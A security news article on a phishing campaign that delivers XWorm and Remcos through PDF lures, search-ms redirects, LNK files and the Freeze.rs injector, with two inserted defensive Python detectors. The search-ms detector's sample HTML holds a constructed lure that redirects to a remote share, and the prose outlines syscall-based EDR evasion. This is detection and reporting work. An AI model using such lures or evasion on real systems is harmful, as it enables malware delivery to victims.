XWorm, Remcos RAT Evade EDRs to Infect Critical Infrastructure

Published: 23/11/2024   Category: security




Disguised as harmless PDF documents, LNK files trigger a PowerShell script, initiating a Rust-based injector called Freeze[.]rs and a host of malware infections.



The Rust-based injector Freeze[.]rs has been weaponized to introduce a raft of malware to targets, in a sophisticated phishing campaign containing a malicious PDF file that gets around endpoint detection and response (EDR).
First discovered by Fortinet's FortiGuard Labs in July, the campaign is targeting victims across Europe and North America, including specialty chemical and industrial product suppliers.
Eventually, this chain culminates in the loading of XWorm malware establishing communication with a command-and-control (C2) server, an analysis by the firm revealed. XWorm can carry out a wide range of functions, from loading ransomware to acting as a persistent backdoor.
Further revelations also unveiled the involvement of SYK Crypter, a tool frequently utilized to distribute malware families via the Discord community chat platform. This crypter played a role in loading Remcos, a sophisticated remote access Trojan (RAT) adept at controlling and monitoring Windows devices.
In their investigation, the team's analysis of encoded algorithms and API names traced the origin of this novel injector back to the Red Team tool Freeze.rs, designed explicitly for crafting payloads capable of bypassing EDR security measures.
This file redirects to an HTML file and utilizes the search-ms protocol to access an LNK file on a remote server, a company blog post explained. Upon clicking the LNK file, a PowerShell script executes Freeze[.]rs and SYK Crypter for further offensive actions.
Cara Lin, researcher, FortiGuard Labs, explains that the Freeze[.]rs injector calls NT syscalls to inject the shellcode, skipping the standard calls that are in kernelbase.dll, which may be hooked.
They use the slight delay that occurs before an EDR starts hooking and altering the assembly of system DLLs within a process, she says. If a process is created in a suspended state, it has minimal DLLs loaded, and no EDR-specific DLLs are loaded, indicating that the syscalls within Ntdll.dll remain unaltered.
Lin explains the attack chain is initiated through a booby-trapped PDF file, which works together with a search-ms protocol to deliver the payload.
This JavaScript code utilized the search-ms functionality to reveal the LNK file located on a remote server.
The search-ms protocol can redirect users to a remote server via a Windows Explorer Window.
Through the use of a deceptive LNK file disguised as a PDF icon, it can deceive victims into believing that the file originates from their own system and is legitimate, she notes.
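The delivery step described above, a document or web page that opens a search-ms: URI whose location crumb points at a remote share, is something a mail gateway or sandbox can flag before a user ever sees the Explorer window. The following detector is an added example, not code from the original article or from Fortinet; the HTML sample, the host 203.0.113.10 and the share name are constructed, and the search-ms parameter names (query, crumb, displayname) are the documented ones for that protocol.

```python
import re
from urllib.parse import unquote

# Matches a search-ms: URI embedded in HTML, JavaScript or PDF-embedded JavaScript text.
SEARCH_MS_RE = re.compile(r'search-ms:[^\s"\'<>)]+', re.IGNORECASE)


def parse_search_ms(uri: str) -> dict:
    """Split a search-ms: URI into its parameters.

    Parameters are '&'-separated key=value pairs and may be URL-encoded.
    A key may repeat (several crumb= parameters are legal), so every key
    maps to a list of decoded values.
    """
    body = uri[len("search-ms:"):]
    params: dict = {}
    for part in body.split("&"):
        if "=" not in part:
            continue
        key, value = part.split("=", 1)
        params.setdefault(key.lower(), []).append(unquote(value))
    return params


def is_remote_location(location: str) -> bool:
    """True if a crumb=location: value points off the local machine
    (a UNC share or a WebDAV URL) rather than at a local folder."""
    loc = location.strip().lower()
    return loc.startswith(("\\\\", "//", "http://", "https://"))


def find_remote_search_ms(text: str) -> list:
    """Return every search-ms URI in text whose location crumb targets a remote host."""
    findings = []
    for match in SEARCH_MS_RE.finditer(text):
        uri = match.group(0)
        params = parse_search_ms(uri)
        for crumb in params.get("crumb", []):
            if not crumb.lower().startswith("location:"):
                continue
            location = crumb[len("location:"):]
            if is_remote_location(location):
                findings.append({
                    "uri": uri,
                    "location": location,
                    # The display name is what the victim sees as the Explorer window title.
                    "displayname": (params.get("displayname") or [""])[0],
                })
    return findings


# Constructed sample: one redirect to a remote share, one benign link to a local folder.
SAMPLE_HTML = """<html><body>
<script>
// opens an Explorer search window rooted on a remote share
window.location.href = "search-ms:query=Invoice&crumb=location:%5C%5C203.0.113.10%5Cshare&displayname=Downloads";
</script>
<a href="search-ms:query=report&crumb=location:C:%5CUsers%5CPublic&displayname=Local">benign</a>
</body></html>"""

if __name__ == "__main__":
    for hit in find_remote_search_ms(SAMPLE_HTML):
        print(f"remote search-ms location {hit['location']!r} shown as {hit['displayname']!r}")
```

The same function can be run over the decoded JavaScript streams of a PDF or over proxy logs of fetched HTML; the point is that a location crumb starting with `\\` or a URL means Windows Explorer will reach out to that host and render whatever LNK files it serves as if they were local results.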
Meanwhile, the SYK Crypter copies itself to the Startup folder for persistence, encrypts the configuration during encoding and decrypts it upon execution, and also encrypts the compressed payload in the resource for obfuscation, she adds.
A downloader is utilized alongside encoding in the first layer and subsequently, a second layer involves string obfuscation and payload encryption.
This multi-layered strategy is designed to enhance the complexity and challenge for static analysis, she says. Finally, it can terminate itself upon recognizing a specific security vendor.
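The persistence step, a process copying its own executable into the user's Startup folder, leaves a file-creation event that is easy to score on an endpoint. The following triage logic is an added example and not code from the article or from Fortinet: it takes file-creation records in the shape of Sysmon Event ID 11 fields (Image and TargetFilename) and raises the score when the written file is executable content, when its name matches the writing process (a self-copy), or when the writer itself runs from a temporary or download location. The three events are constructed.

```python
import re
from pathlib import PureWindowsPath

# Per-user and all-users Startup folders share this path suffix.
STARTUP_DIR_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
# Writer processes running from these locations are not normal installers.
TRANSIENT_SRC_RE = re.compile(r"\\(Temp|Downloads|Public)\\", re.IGNORECASE)
# Extensions that execute or launch something when Explorer processes the folder at logon.
RISKY_EXT = {".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".lnk", ".hta"}


def analyze_file_create(event: dict):
    """Score one file-creation event; returns None when the target is not a Startup folder."""
    target = event["TargetFilename"]
    if not STARTUP_DIR_RE.search(target):
        return None
    image = event["Image"]
    tpath, ipath = PureWindowsPath(target), PureWindowsPath(image)
    reasons = []
    if tpath.suffix.lower() in RISKY_EXT:
        reasons.append("executable content written to Startup")
    if tpath.name.lower() == ipath.name.lower():
        reasons.append("writer copied itself (same file name)")
    if TRANSIENT_SRC_RE.search(image):
        reasons.append("writer runs from a temporary or download location")
    score = len(reasons)
    return {
        "target": target,
        "image": image,
        "score": score,
        "severity": "high" if score >= 2 else ("medium" if score == 1 else "low"),
        "reasons": reasons,
    }


def triage(events: list) -> list:
    """Return the scored findings for every event that touched a Startup folder."""
    return [r for r in (analyze_file_create(e) for e in events) if r is not None]


# Constructed sample events in the shape of Sysmon Event ID 11 (FileCreate) fields.
SAMPLE_EVENTS = [
    {   # a downloaded executable copying itself into the user's Startup folder
        "Image": r"C:\Users\alice\AppData\Local\Temp\Invoice.exe",
        "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Invoice.exe",
    },
    {   # an installed vendor application dropping a tray-app shortcut
        "Image": r"C:\Program Files\Vendor\setup.exe",
        "TargetFilename": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VendorTray.lnk",
    },
    {   # unrelated document write, not in a Startup folder
        "Image": r"C:\Windows\explorer.exe",
        "TargetFilename": r"C:\Users\alice\Documents\notes.txt",
    },
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["severity"], finding["target"], "; ".join(finding["reasons"]))
```

The vendor shortcut still surfaces as medium because a shortcut in Startup is executable content, which is the right default for a folder that gets run at every logon; an allow-list of signed installer images would lower it further in production.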
Phishing and other messaging-based attacks continue to be a pervasive threat, with 97% of companies seeing at least one email phishing attack in the past 12 months and three-quarters of firms expecting significant costs from an email-based attack.
Phishing attacks are getting smarter and more targeted, adapting to new technology and user behavior, evolving to include mobile exploits, brand impersonation, and AI-generated content.
The research notes it's crucial to maintain up-to-date software to mitigate risks, provide regular training, and use advanced security tools for defenses to counter the evolving threat of phishing attacks.
Phishing simulation training for employees appears to work better at critical infrastructure organizations than it does across other sectors, with 66% of those employees correctly reporting at least one real malicious email attack within a year of training, new research has found.
